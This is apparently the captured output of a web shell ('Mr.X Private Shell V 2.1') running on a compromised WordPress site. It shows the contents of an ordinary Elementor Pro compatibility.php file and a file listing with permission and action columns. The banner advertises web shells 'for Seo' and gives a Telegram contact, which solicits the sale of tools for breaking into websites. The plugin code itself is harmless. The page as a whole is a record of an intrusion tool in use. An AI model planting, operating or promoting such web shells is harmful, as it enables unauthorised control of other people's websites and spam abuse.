__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace ElementorPro\Core\Compatibility;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly
}
class Compatibility {
public static function register_actions() {
add_action( 'init', [ __CLASS__, 'on_init' ] );
}
public static function on_init() {
static::translate_press();
}
private static function translate_press() {
if ( ! class_exists( 'TRP_Translate_Press' ) ) {
return;
}
add_filter( 'elementor_pro/license/api/use_home_url', '__return_false' );
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| compatibility.php | File | 505 B | 0664 |
|